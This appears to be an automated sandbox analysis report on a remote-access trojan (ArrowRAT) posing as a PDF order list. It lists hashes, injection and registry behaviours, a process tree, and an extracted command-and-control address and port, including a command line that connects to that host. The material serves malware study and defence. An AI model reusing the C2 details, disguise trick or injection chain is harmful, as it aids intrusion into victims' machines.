Analysis
-
max time kernel
130s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14-10-2023 03:13
Static task
static1
Behavioral task
behavioral1
Sample
MOQ_T7FIBA00541·PDF .scr
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
MOQ_T7FIBA00541·PDF .scr
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
ORDER LIST_SEPT7FIBA00541·PDF.scr
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
ORDER LIST_SEPT7FIBA00541·PDF.scr
Resource
win10v2004-20230915-en
General
-
Target
ORDER LIST_SEPT7FIBA00541·PDF.scr
-
Size
670KB
-
MD5
48a5e2b45923213e94a82d30db1eb988
-
SHA1
eb3c3aeb61e6e20b149cbd966f60c81a8215e8b0
-
SHA256
19fa9896468d7dd79d76fa27b34f66e13b6c5268cdd574c0a78eeb0e3dbeb839
-
SHA512
13edc7b141a8bd854a07ec70371f6fe59055d1dfe4127e3912992181d983e710f990d0cfcaa294e5da8e37ab757efb93133382625e210c47823885586fc536da
-
SSDEEP
12288:PBzhfOS3GXJNUwCpoOekXOS6zjwehALsCGlhcBd:phfOS3sJWwvOeYCras
Malware Config
Extracted
arrowrat
Client
192.159.99.3:1337
qawNWRCCU
Signatures
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1016 set thread context of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 2468 set thread context of 2568 2468 aspnet_compiler.exe 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 2976 ipconfig.exe 2656 ipconfig.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 2468 aspnet_compiler.exe 2468 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr Token: SeDebugPrivilege 2468 aspnet_compiler.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe Token: SeShutdownPrivilege 2536 explorer.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe 2536 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2468 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 1016 wrote to memory of 1664 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 28 PID 1016 wrote to memory of 1664 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 28 PID 1016 wrote to memory of 1664 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 28 PID 1016 wrote to memory of 1664 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 28 PID 1664 wrote to memory of 2976 1664 cmd.exe 30 PID 1664 wrote to memory of 2976 1664 cmd.exe 30 PID 1664 wrote to memory of 2976 1664 cmd.exe 30 PID 1664 wrote to memory of 2976 1664 cmd.exe 30 PID 1016 wrote to memory of 3004 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 32 PID 1016 wrote to memory of 3004 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 32 PID 1016 wrote to memory of 3004 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 32 PID 1016 wrote to memory of 3004 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 32 PID 3004 wrote to memory of 2656 3004 cmd.exe 34 PID 3004 wrote to memory of 2656 3004 cmd.exe 34 PID 3004 wrote to memory of 2656 3004 cmd.exe 34 PID 3004 wrote to memory of 2656 3004 cmd.exe 34 PID 1016 wrote to memory of 2792 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 36 PID 1016 wrote to memory of 2792 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 36 PID 1016 wrote to memory of 2792 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 36 PID 1016 wrote to memory of 2792 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 36 PID 1016 wrote to memory of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 1016 wrote to memory of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 1016 wrote to memory of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 1016 wrote to memory of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 1016 wrote to memory of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 1016 wrote to memory of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 1016 wrote to memory of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 1016 wrote to memory of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 1016 wrote to memory of 2468 1016 ORDER LIST_SEPT7FIBA00541·PDF.scr 37 PID 2468 wrote to memory of 2536 2468 aspnet_compiler.exe 38 PID 2468 wrote to memory of 2536 2468 aspnet_compiler.exe 38 PID 2468 wrote to memory of 2536 2468 aspnet_compiler.exe 38 PID 2468 wrote to memory of 2536 2468 aspnet_compiler.exe 38 PID 2468 wrote to memory of 2568 2468 aspnet_compiler.exe 39 PID 2468 wrote to memory of 2568 2468 aspnet_compiler.exe 39 PID 2468 wrote to memory of 2568 2468 aspnet_compiler.exe 39 PID 2468 wrote to memory of 2568 2468 aspnet_compiler.exe 39 PID 2468 wrote to memory of 2568 2468 aspnet_compiler.exe 39 PID 2468 wrote to memory of 2568 2468 aspnet_compiler.exe 39 PID 2468 wrote to memory of 2568 2468 aspnet_compiler.exe 39 PID 2468 wrote to memory of 2568 2468 aspnet_compiler.exe 39 PID 2468 wrote to memory of 2568 2468 aspnet_compiler.exe 39 PID 2536 wrote to memory of 1396 2536 explorer.exe 41 PID 2536 wrote to memory of 1396 2536 explorer.exe 41 PID 2536 wrote to memory of 1396 2536 explorer.exe 41 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ORDER LIST_SEPT7FIBA00541·PDF.scr"C:\Users\Admin\AppData\Local\Temp\ORDER LIST_SEPT7FIBA00541·PDF.scr" /S1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /release2⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release3⤵
- Gathers network information
PID:2976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ipconfig /renew2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /renew3⤵
- Gathers network information
PID:2656
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe2⤵PID:2792
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:1396
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 192.159.99.3 1337 qawNWRCCU3⤵PID:2568
-
-